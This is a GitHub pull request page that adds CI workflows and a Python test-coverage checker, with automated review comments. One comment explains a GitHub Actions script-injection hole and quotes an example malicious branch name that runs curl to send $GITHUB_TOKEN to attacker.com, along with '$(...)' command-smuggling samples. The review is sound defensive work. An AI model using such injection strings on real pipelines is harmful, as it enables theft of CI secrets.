Skip to content
Closed
Show file tree
Hide file tree
Changes from 2 commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
25 changes: 25 additions & 0 deletions .github/workflows/check_coverage.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
name: API Coverage Check

on:
push:
branches: [main]
pull_request:
branches: [main]

jobs:
api_coverage:
name: "Check public API test coverage"
runs-on: ubuntu-latest
timeout-minutes: 5
steps:
- uses: actions/checkout@v4

- uses: actions/setup-python@v5
with:
python-version: "3.12"

- name: Check public API test coverage
run: python scripts/check_test_coverage.py

- name: Check public function assertions
run: python scripts/check_asserts.py
41 changes: 41 additions & 0 deletions .github/workflows/cpu_ref_tests.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,41 @@
name: CPU Reference Tests

on:
push:
branches: [main]
paths:
- "tops/cpu/**"
- "tests/ref/**"
pull_request:
branches: [main]
paths:
- "tops/cpu/**"
- "tests/ref/**"
Comment on lines +4 to +13
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
# First, check if the files exist
ls -la .github/workflows/cpu_ref_tests.yml 2>/dev/null && echo "✓ Workflow file exists" || echo "✗ Workflow file missing"
ls -la .github/ci/cpu-ref-tests-gpu.sky.yaml 2>/dev/null && echo "✓ SkyPilot config exists" || echo "✗ SkyPilot config missing"

# List files in these directories
echo -e "\n=== Files in .github/workflows/ ==="
ls -1 .github/workflows/ 2>/dev/null | head -20

echo -e "\n=== Files in .github/ci/ ==="
ls -1 .github/ci/ 2>/dev/null | head -20

Repository: primatrix/pallas-kernel

Length of output: 473


🏁 Script executed:

#!/bin/bash
# Read the workflow file
echo "=== .github/workflows/cpu_ref_tests.yml ==="
cat -n .github/workflows/cpu_ref_tests.yml

Repository: primatrix/pallas-kernel

Length of output: 2228


🏁 Script executed:

#!/bin/bash
# Read the SkyPilot config file to check if it exists and what's in lines 10-24
if [ -f ".github/ci/cpu-ref-tests-gpu.sky.yaml" ]; then
  echo "=== .github/ci/cpu-ref-tests-gpu.sky.yaml (lines 1-30) ==="
  head -30 .github/ci/cpu-ref-tests-gpu.sky.yaml | cat -n
else
  echo "File .github/ci/cpu-ref-tests-gpu.sky.yaml not found"
  echo "Searching for similar files..."
  find .github -name "*.sky.yaml" -o -name "*cpu*ref*" 2>/dev/null
fi

Repository: primatrix/pallas-kernel

Length of output: 872


🏁 Script executed:

#!/bin/bash
# Search for any references to the SkyPilot file in the workflow or other CI files
echo "=== References to 'cpu-ref-tests' or '.sky.yaml' in workflows ==="
rg -i "cpu-ref-tests|sky.yaml" .github/workflows/ --no-heading -n 2>/dev/null || true

echo -e "\n=== All YAML files in .github/ ==="
find .github -name "*.yaml" -o -name "*.yml" | sort

Repository: primatrix/pallas-kernel

Length of output: 587


Include the delegated CI files in this trigger set.

This workflow fully delegates execution to .github/ci/cpu-ref-tests-gpu.sky.yaml (lines 16-24 contain the dependency setup and pytest execution), but neither that file nor this workflow itself is included in the trigger paths. A PR that only changes the CI wiring will merge without ever exercising this check.

🛠️ Suggested change
   push:
     branches: [main]
     paths:
+      - ".github/workflows/cpu_ref_tests.yml"
+      - ".github/ci/cpu-ref-tests-gpu.sky.yaml"
       - "tops/cpu/**"
       - "tests/ref/**"
   pull_request:
     branches: [main]
     paths:
+      - ".github/workflows/cpu_ref_tests.yml"
+      - ".github/ci/cpu-ref-tests-gpu.sky.yaml"
       - "tops/cpu/**"
       - "tests/ref/**"
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
push:
branches: [main]
paths:
- "tops/cpu/**"
- "tests/ref/**"
pull_request:
branches: [main]
paths:
- "tops/cpu/**"
- "tests/ref/**"
push:
branches: [main]
paths:
- ".github/workflows/cpu_ref_tests.yml"
- ".github/ci/cpu-ref-tests-gpu.sky.yaml"
- "tops/cpu/**"
- "tests/ref/**"
pull_request:
branches: [main]
paths:
- ".github/workflows/cpu_ref_tests.yml"
- ".github/ci/cpu-ref-tests-gpu.sky.yaml"
- "tops/cpu/**"
- "tests/ref/**"
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/workflows/cpu_ref_tests.yml around lines 4 - 13, The workflow
trigger is missing the delegated CI file, so changes to the delegated pipeline
won't run this check; update the workflow triggers in cpu_ref_tests.yml to
include the delegated CI file(s) (at least the file named
cpu-ref-tests-gpu.sky.yaml or the .github/ci/** folder) so edits to the
delegated CI wiring cause the workflow to run; modify the push and pull_request
paths blocks to add those paths alongside "tops/cpu/**" and "tests/ref/**".


concurrency:
group: cpu-ref-tests-${{ github.head_ref || github.ref_name }}
cancel-in-progress: true

jobs:
cpu_ref_tests:
name: "CPU reference kernel tests"
runs-on: ubuntu-latest
timeout-minutes: 15
steps:
- uses: actions/checkout@v4

- uses: actions/setup-python@v5
with:
python-version: "3.12"

- name: Install uv
uses: astral-sh/setup-uv@v4

Comment on lines +46 to +52
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

# First, let's check the actual workflow file to understand the context
cat -n .github/workflows/cpu_ref_tests.yml | head -60

Repository: primatrix/pallas-kernel

Length of output: 2049


🌐 Web query:

GitHub Actions context interpolation security github.head_ref command injection

💡 Result:

Yes, direct interpolation of GitHub Actions context variables like github.head_ref into shell commands (run: steps) enables command injection vulnerabilities. github.head_ref represents the source branch of a pull request (available in pull_request or pull_request_target events) and is attacker-controlled, especially in forks or pull requests. Vulnerable pattern: - run: echo "${{ github.head_ref }}" An attacker creates a branch named test"; curl https://attacker.com/?token=$GITHUB_TOKEN;#, injecting and executing arbitrary shell commands, potentially exfiltrating secrets like GITHUB_TOKEN. This is confirmed in official GitHub documentation on script injections, which lists github.head_ref as untrusted input that can lead to shell command injection when interpolated into inline scripts. Real-world examples include CVEs like CVE-2026-33475 (Langflow) and GHSA-7x29-qqmq-v6qc (ultralytics/actions), where unsanitized use of github.head_ref in run: steps allowed RCE via malicious branch names. Mitigations (per GitHub docs): 1. Use environment variables: - env: HEAD_REF: ${{ github.head_ref }} run: echo "$HEAD_REF" The expression evaluates to a safe env var, preventing injection during shell script generation. 2. Prefer JavaScript actions over inline shell scripts for processing untrusted input. 3. Avoid pull_request_target trigger unless necessary, as it provides write access and untrusted checkout. 4. Pin GITHUB_TOKEN permissions to read-only where possible. Use in if: conditions or non-shell contexts (e.g., with:) is safe, as expressions are evaluated by the Actions engine, not shell.

Citations:


🌐 Web query:

GitHub Actions env vs run direct interpolation ${{ }} security best practices

💡 Result:

In GitHub Actions, using ${{ }} direct interpolation in the 'run' section with untrusted inputs (e.g., github.event.issue.title) is insecure because it enables command injection attacks. Attackers can craft inputs like '$(touch pwned.txt)' that get macro-expanded directly into the shell command. Security best practice: Set potentially untrusted values in the 'env' section using ${{ }}, then reference them in 'run' using standard shell syntax (e.g., "$TITLE"). This stores the value in an environment variable, preventing direct injection into the command. Example (vulnerable): - name: print title run: echo "${{ github.event.issue.title }}" Example (secure): - name: print title env: TITLE: ${{ github.event.issue.title }} run: echo "$TITLE" This applies to secrets too: Pass secrets via env to avoid command-line exposure. Official GitHub recommendations emphasize this for mitigating script injection.

Citations:


Don't interpolate github.head_ref directly into the shell.

Line 49 splices attacker-controlled branch names into the script body. A branch like foo$(...) will execute on the runner before BRANCH is assigned. Pass the value through env: and read the env var inside Bash instead.

🛠️ Suggested change
       - name: Generate cluster name
         id: cluster
+        env:
+          BRANCH_NAME: ${{ github.head_ref || github.ref_name }}
         run: |
-          BRANCH="${{ github.head_ref || github.ref_name }}"
+          BRANCH="$BRANCH_NAME"
           NAME="ci-ref-$(echo "$BRANCH" | tr '/_' '--' | tr '[:upper:]' '[:lower:]' | head -c 20)-${GITHUB_RUN_NUMBER}"
           echo "name=$NAME" >> "$GITHUB_OUTPUT"
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
- name: Generate cluster name
id: cluster
run: |
BRANCH="${{ github.head_ref || github.ref_name }}"
NAME="ci-ref-$(echo "$BRANCH" | tr '/_' '--' | tr '[:upper:]' '[:lower:]' | head -c 20)-${GITHUB_RUN_NUMBER}"
echo "name=$NAME" >> "$GITHUB_OUTPUT"
- name: Generate cluster name
id: cluster
env:
BRANCH_NAME: ${{ github.head_ref || github.ref_name }}
run: |
BRANCH="$BRANCH_NAME"
NAME="ci-ref-$(echo "$BRANCH" | tr '/_' '--' | tr '[:upper:]' '[:lower:]' | head -c 20)-${GITHUB_RUN_NUMBER}"
echo "name=$NAME" >> "$GITHUB_OUTPUT"
🧰 Tools
🪛 actionlint (1.7.11)

[error] 48-48: "github.head_ref" is potentially untrusted. avoid using it directly in inline scripts. instead, pass it through an environment variable. see https://docs.github.com/en/actions/reference/security/secure-use#good-practices-for-mitigating-script-injection-attacks for more details

(expression)

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/workflows/cpu_ref_tests.yml around lines 46 - 52, The step with id
"cluster" currently interpolates github.head_ref/github.ref_name directly into
the run script, which lets attacker-controlled branch names be executed; change
the step to pass those values via env: (e.g., set GITHUB_HEAD_REF: ${{
github.head_ref }} and GITHUB_REF_NAME: ${{ github.ref_name }}) and then inside
the run block read them from the environment (e.g.,
BRANCH="${GITHUB_HEAD_REF:-$GITHUB_REF_NAME}") before sanitizing and building
NAME; this removes direct shell interpolation of workflow expressions and
prevents branch names like `foo$(...)` from being executed.

- name: Install dependencies
run: |
uv sync --extra dev
uv pip install torch --index-url https://download.pytorch.org/whl/cpu

- name: Run CPU reference tests
run: |
uv run pytest tests/ref/ -v -o "addopts=--strict-markers"
177 changes: 177 additions & 0 deletions scripts/check_test_coverage.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,177 @@
#!/usr/bin/env python3
"""
检查 tops/ops/ 下所有公开接口是否具有对应的测试覆盖。

扫描 tops/ops/ 各子包的 __init__.py,提取公开 API 符号列表,
然后在 tests/ 目录中搜索每个符号是否被至少一个测试文件引用。
若存在未覆盖的接口,脚本以非零退出码退出,可用于 CI 门控。

支持的导出风格:
1. __all__ = ["symbol1", "symbol2", ...]
2. from .mod import name as name (PEP 484 显式 re-export)
"""

import ast
import re
import sys
from pathlib import Path


def _extract_dunder_all(tree: ast.Module) -> list[str]:
"""从 AST 中提取 __all__ 列表中的字符串常量。"""
for node in ast.iter_child_nodes(tree):
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

medium

建议使用 tree.body 替代 ast.iter_child_nodes(tree) 来遍历模块的顶层节点。tree.body 是一个包含模块中所有顶层语句的列表,这是遍历顶层节点的标准且更直接的方式。ast.iter_child_nodes 是一个未在文档中明确作为公共API的函数,使用 tree.body 可以使代码更清晰且符合 ast 模块的惯用实践。

Suggested change
for node in ast.iter_child_nodes(tree):
for node in tree.body:

if not isinstance(node, ast.Assign):
continue
for target in node.targets:
if isinstance(target, ast.Name) and target.id == "__all__":
if isinstance(node.value, ast.List):
return [
elt.value
for elt in node.value.elts
if isinstance(elt, ast.Constant) and isinstance(elt.value, str)
]
return []


def _extract_reexports(tree: ast.Module) -> list[str]:
"""提取 'from .mod import name as name' 风格的显式 re-export 符号。"""
names = []
for node in ast.iter_child_nodes(tree):
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

medium

同样,这里建议使用 tree.body 替代 ast.iter_child_nodes(tree),以提高代码的可读性并遵循 ast 模块的惯用模式。

Suggested change
for node in ast.iter_child_nodes(tree):
for node in tree.body:

if not isinstance(node, ast.ImportFrom):
continue
if node.level == 0:
continue
for alias in node.names:
if alias.asname is not None and alias.asname == alias.name:
names.append(alias.asname)
return names


def discover_public_interfaces(ops_dir: Path) -> dict[str, list[str]]:
"""扫描 tops/ops/ 子包的 __init__.py,发现公开 API 符号。

检测策略(按优先级):
1. 若 __init__.py 含 __all__ = [...] → 使用其中的符号名
2. 若 __init__.py 含 'from .x import y as y' re-export → 收集符号名
3. 若 __init__.py 为空或无导出内容 → 跳过

Args:
ops_dir: tops/ops/ 目录路径

Returns:
dict,键为 "tops.ops.<subpackage>",值为公开符号名列表
"""
result = {}
for subdir in sorted(ops_dir.iterdir()):
if not subdir.is_dir():
continue
init_file = subdir / "__init__.py"
if not init_file.exists():
continue

source = init_file.read_text(encoding="utf-8")
if not source.strip():
continue

tree = ast.parse(source, filename=str(init_file))

all_names = _extract_dunder_all(tree)
if all_names:
result[f"tops.ops.{subdir.name}"] = all_names
continue

reexports = _extract_reexports(tree)
if reexports:
result[f"tops.ops.{subdir.name}"] = reexports
continue

return result


def find_test_references(
tests_dir: Path, symbols: list[str]
) -> dict[str, list[str]]:
"""检查哪些符号在测试文件中被引用。

扫描 tests/ 下所有 .py 文件(排除 tests/src/),
对每个符号做词边界正则匹配。

Args:
tests_dir: tests/ 目录路径
symbols: 待检查的符号名列表

Returns:
dict,键为符号名,值为引用该符号的测试文件路径列表
"""
patterns = {
sym: re.compile(r"\b" + re.escape(sym) + r"\b") for sym in symbols
}
references: dict[str, list[str]] = {sym: [] for sym in symbols}

for py_file in sorted(tests_dir.rglob("*.py")):
rel = py_file.relative_to(tests_dir)
if rel.parts and rel.parts[0] == "src":
continue

content = py_file.read_text(encoding="utf-8")
for sym, pattern in patterns.items():
if pattern.search(content):
references[sym].append(str(py_file))
Comment on lines +106 to +119
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

high

当前 find_test_references 函数的实现效率较低。它为每个符号都编译一个正则表达式,然后遍历每个测试文件,并对文件内容逐一尝试匹配所有符号的正则表达式。当符号数量较多时,这会导致大量的重复操作和性能开销。

为了优化,建议将所有符号合并成一个单一的、更复杂的正则表达式。这样,对于每个文件,只需进行一次正则搜索即可找到所有被引用的符号。这种方法可以显著提高脚本的执行速度,尤其是在 CI 环境中。

  if not symbols:
    return {}
  references: dict[str, list[str]] = {sym: [] for sym in symbols}
  combined_pattern = re.compile("\\b(" + "|".join(map(re.escape, symbols)) + ")\\b")

  for py_file in sorted(tests_dir.rglob("*.py")):
    rel = py_file.relative_to(tests_dir)
    if rel.parts and rel.parts[0] == "src":
      continue

    content = py_file.read_text(encoding="utf-8")
    for sym in set(combined_pattern.findall(content)):
      references[sym].append(str(py_file))


return references


def main():
project_root = Path(__file__).resolve().parents[1]
ops_dir = project_root / "tops" / "ops"
tests_dir = project_root / "tests"

assert ops_dir.is_dir(), f"目录不存在: {ops_dir}"
assert tests_dir.is_dir(), f"目录不存在: {tests_dir}"

interfaces = discover_public_interfaces(ops_dir)

if not interfaces:
print("未在 tops/ops/ 中发现公开接口,无需检查。")
sys.exit(0)

all_symbols = []
for symbols in interfaces.values():
all_symbols.extend(symbols)

references = find_test_references(tests_dir, all_symbols)

total = 0
covered = 0
gaps = []

for pkg, symbols in sorted(interfaces.items()):
print(f"\n{'=' * 60}")
print(f"Package: {pkg} ({len(symbols)} interfaces)")
print(f"{'=' * 60}")
for sym in symbols:
total += 1
files = references.get(sym, [])
if files:
covered += 1
print(f" [PASS] {sym} ({len(files)} test files)")
else:
gaps.append((pkg, sym))
print(f" [MISS] {sym} -- 无测试覆盖")

print(f"\n{'=' * 60}")
print(f"汇总: {covered}/{total} 接口已覆盖")
print(f"{'=' * 60}")

if gaps:
print(f"\n检查失败: {len(gaps)} 个接口缺少测试覆盖:")
for pkg, sym in gaps:
print(f" - {pkg}.{sym}")
sys.exit(1)
else:
print("\n所有公开接口均已具备测试覆盖。")
sys.exit(0)


if __name__ == "__main__":
main()
Loading